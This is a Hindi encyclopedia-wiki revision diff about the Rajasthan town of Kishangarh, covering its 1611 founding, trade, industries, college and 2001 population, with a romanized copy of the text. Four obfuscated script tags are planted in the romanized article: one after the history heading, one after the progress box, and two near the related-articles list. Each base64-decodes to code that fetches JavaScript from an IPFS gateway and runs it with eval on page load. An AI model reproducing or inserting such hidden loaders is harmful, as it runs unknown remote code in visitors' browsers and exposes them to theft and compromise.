Difference between revisions of "किशनगढ़"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - "ते है।" to "ते हैं।")
Line 1: Line 1:
 +
[[चित्र:Kishangarh-Fort.jpg|thumb|250px|किशनगढ़ क़िला]]
 +
'''किशनगढ़''' नगर मध्य [[राजस्थान]] राज्य, पश्चिमोत्तर [[भारत]] में है। यह [[जयपुर]] के दक्षिण में 80 किलोमीटर दूर गुंडालाओ झील के किनारे स्थित है।
 +
==इतिहास==
 
{{tocright}}
 
{{tocright}}
किशनगढ़ नगर मध्य [[राजस्थान]] राज्य, पश्चिमोत्तर [[भारत]] में है। यह [[जयपुर]] के दक्षिण में 80 किलोमीटर दूर गुंडालाओ झील के किनारे स्थित है।
 
==इतिहास==
 
 
क़िले व महल युक्त इस नगर की स्थापना 1611 ई. में एक राजपूत किशन सिंह (राजपूताना ऐतिहासिक क्षेत्र के एक योद्धा शासक) ने की थी। यह भूतपूर्व किशनगढ़ रियासत की राजधानी था, जो [[1948]] ई. में राजस्थान का हिस्सा बना।
 
क़िले व महल युक्त इस नगर की स्थापना 1611 ई. में एक राजपूत किशन सिंह (राजपूताना ऐतिहासिक क्षेत्र के एक योद्धा शासक) ने की थी। यह भूतपूर्व किशनगढ़ रियासत की राजधानी था, जो [[1948]] ई. में राजस्थान का हिस्सा बना।
 
==यातायात और परिवहन==  
 
==यातायात और परिवहन==  
 
सूती वस्त्र व कृषि उत्पादों क व्यापार केंद्र किशनगढ़ [[अजमेर]], [[जयपुर]] के साथ सड़क व रेलमार्ग से जुड़ा है।  
 
सूती वस्त्र व कृषि उत्पादों क व्यापार केंद्र किशनगढ़ [[अजमेर]], [[जयपुर]] के साथ सड़क व रेलमार्ग से जुड़ा है।  
 
==उद्योग और व्यापार==
 
==उद्योग और व्यापार==
यहाँ पर साबुन, ऊनी कालीन और शॉल बनाए जाते हैं। हथकरघा बुनाई, कपडे की रंगाई और कीमती पत्थरों की कटाई यहाँ के स्थानीय कुटीर उद्योग हैं।  
+
यहाँ पर साबुन, ऊनी कालीन और शॉल बनाए जाते हैं। हथकरघा बुनाई, कपडे की [[रंगाई]] और कीमती पत्थरों की कटाई यहाँ के स्थानीय कुटीर उद्योग हैं।  
 
==शिक्षण संस्थान==
 
==शिक्षण संस्थान==
 
किशनगढ़ की सार्वजनिक इमारतों में एक अस्पताल और राजस्थान विश्वविद्यालय से संबद्ध एक सरकारी महाविद्यालय है।  
 
किशनगढ़ की सार्वजनिक इमारतों में एक अस्पताल और राजस्थान विश्वविद्यालय से संबद्ध एक सरकारी महाविद्यालय है।  
 
==जनसंख्या==
 
==जनसंख्या==
 
2001 की जनगणना के अनुसार किशनगढ़ की जनसंख्या 1,16,156 है।  
 
2001 की जनगणना के अनुसार किशनगढ़ की जनसंख्या 1,16,156 है।  
 
+
{{प्रचार}}
 
 
{{लेख प्रगति
 
{{लेख प्रगति
 
|आधार=
 
|आधार=
Line 21: Line 21:
 
}}
 
}}
 
==संबंधित लेख==
 
==संबंधित लेख==
 +
{{राजस्थान के नगर}}
 
{{राजस्थान के पर्यटन स्थल}}
 
{{राजस्थान के पर्यटन स्थल}}
[[Category:राजस्थान]][[Category:राजस्थान के ऐतिहासिक नगर]]
+
[[Category:राजस्थान]][[Category:राजस्थान के ऐतिहासिक नगर]][[Category:राजस्थान के नगर]][[Category:भारत के नगर]]
 
__INDEX__
 
__INDEX__

Revision as of 07:30, 8 August 2012

thumb|250px|kishanagadh qila kishanagadh nagar madhy rajasthan rajy, pashchimottar bharat mean hai. yah jayapur ke dakshin mean 80 kilomitar door guandalao jhil ke kinare sthit hai.

itihas

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

qile v mahal yukt is nagar ki sthapana 1611 ee. mean ek rajapoot kishan sianh (rajapootana aitihasik kshetr ke ek yoddha shasak) ne ki thi. yah bhootapoorv kishanagadh riyasat ki rajadhani tha, jo 1948 ee. mean rajasthan ka hissa bana.

yatayat aur parivahan

sooti vastr v krishi utpadoan k vyapar keandr kishanagadh ajamer, jayapur ke sath s dak v relamarg se ju da hai.

udyog aur vyapar

yahaan par sabun, ooni kalin aur sh aaul banae jate haian. hathakaragha bunaee, kapade ki rangaee aur kimati pattharoan ki kataee yahaan ke sthaniy kutir udyog haian.

shikshan sansthan

kishanagadh ki sarvajanik imaratoan mean ek aspatal aur rajasthan vishvavidyalay se sanbaddh ek sarakari mahavidyalay hai.

janasankhya

2001 ki janaganana ke anusar kishanagadh ki janasankhya 1,16,156 hai.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>